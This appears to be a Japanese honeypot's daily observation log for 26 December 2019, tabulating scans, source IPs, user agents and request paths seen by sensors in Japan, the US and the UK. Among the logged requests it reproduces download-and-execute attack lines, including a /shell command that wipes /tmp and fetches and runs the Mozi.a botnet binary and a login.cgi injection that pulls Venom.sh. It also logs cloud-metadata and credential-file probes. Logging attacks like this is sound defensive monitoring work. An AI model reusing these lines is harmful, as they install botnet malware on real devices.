ハニーポット(仮) 観測記録 2019/12/26分です。
特徴
Location:JP
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
Apache Tomcat管理画面へのスキャン行為
WordPress管理画面へのスキャン行為
を確認しました。
Location:US
Shenzhen TVT製品の脆弱性を狙うアクセス
DataCha0s/2.0によるスキャン行為
zgrab/0.xによるスキャン行為
Apache Tomcat管理画面へのスキャン行為
WordPress管理画面へのスキャン行為
を確認しました。
Location:UK
D-link製品の脆弱性を狙うアクセス
phpMyAdminへのスキャン行為
Apache Tomcat管理画面へのスキャン行為
WordPress管理画面へのスキャン行為
を確認しました
/shellに対して、ファイルダウンロードおよび実行を狙う以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://221[.]210[.]211[.]142:37609/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:60 (前日比:-115)
US:総アクセス数:11 (前日比:-256)
UK:総アクセス数:37 (前日比:-39)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 6 | 142.93.138.116 | United States |
| 1 | 159.203.197.8 | United States |
| 1 | 193.238.46.18 | Russia |
| 1 | 199.19.225.212 | United States |
| 1 | 34.82.148.87 | United States |
| 1 | 35.233.60.210 | United States |
| 17 | 44.224.22.196 | United States |
| 17 | 44.225.84.206 | United States |
| 1 | 45.148.10.140 | Italy |
| 2 | 47.106.169.20 | China |
| 1 | 47.106.8.213 | China |
| 1 | 5.188.210.101 | Russia |
| 1 | 51.89.119.35 | Germany |
| 1 | 72.10.34.20 | United States |
| 2 | 80.82.68.115 | Netherlands |
| 2 | 80.82.68.60 | Netherlands |
| 4 | 94.102.49.193 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 31 | - |
| 14 | AWS Security Scanner |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
| 4 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
| 4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | python-requests/2.10.0 |
| 1 | python-requests/2.22.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
| 1 | GET | /external.php | HTTP/1.1 |
| 3 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /forum/wp-login.php | HTTP/1.1 |
| 1 | GET | /.git/config | HTTP/1.1 |
| 2 | GET | http://169[.]254[.]169[.]254/ | HTTP/1.1 |
| 2 | GET | http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
| 2 | GET | http://example[.]com/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | /index.html | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /muieblackcat | HTTP/1.1 |
| 1 | GET | //myadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //MyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
| 1 | GET | //phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //pma/scripts/setup.php | HTTP/1.1 |
| 3 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /server/wp-login.php | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | GET | /wordpress/wp-login.php | HTTP/1.1 |
| 1 | GET | /wp-login.php | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 10 | \x16\x03\x01 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 122.51.56.227 | China |
| 1 | 134.209.197.127 | United States |
| 1 | 159.203.201.89 | United States |
| 1 | 187.177.99.52 | Mexico |
| 1 | 35.205.80.33 | United States |
| 1 | 35.220.156.28 | United States |
| 2 | 45.148.10.140 | Italy |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 67.229.206.84 | United States |
| 1 | 95.110.201.99 | Italy |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 3 | - |
| 1 | DataCha0s/2.0 |
| 1 | Help |
| 1 | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | |||
| 1 | - | ||
| 1 | GET | /.env?0=0 | HTTP/1.0 |
| 1 | GET | /external.php | HTTP/1.1 |
| 1 | GET | /forum/wp-login.php | HTTP/1.1 |
| 1 | GET | http://us[.]vansto[.]com/verify.txt | HTTP/1.1 |
| 1 | GET | /index.html | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /server/wp-login.php | HTTP/1.1 |
| 1 | GET | /wp-login.php | HTTP/1.1 |
| 1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 104.131.0.18 | United States |
| 1 | 104.199.57.19 | United States |
| 1 | 134.209.102.147 | United States |
| 8 | 144.34.171.15 | United States |
| 1 | 159.203.197.28 | United States |
| 2 | 193.57.40.46 | Ukraine |
| 16 | 212.117.93.206 | Germany |
| 1 | 221.210.211.142 | China |
| 1 | 35.167.249.168 | United States |
| 1 | 41.36.5.145 | Egypt |
| 2 | 45.148.10.140 | Italy |
| 1 | 5.101.0.209 | Russia |
| 1 | 54.159.200.212 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 2 | - |
| 1 | Hakai/2.0 |
| 1 | Hello, world |
| 16 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 |
| 3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 8 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | |||
| 1 | GET | /2phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /external.php | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /index.html | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://185[.]132[.]53[.]119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/mysqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin1/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin2/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin3/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin4/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmy/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phppma/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /server/wp-login.php | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http://221[.]210[.]211[.]142:37609/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /wordpress/wp-login.php | HTTP/1.1 |
| 1 | GET | /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /wp-login.php | HTTP/1.1 |
| 1 | GET | /wp/wp-login.php | HTTP/1.1 |
| 3 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
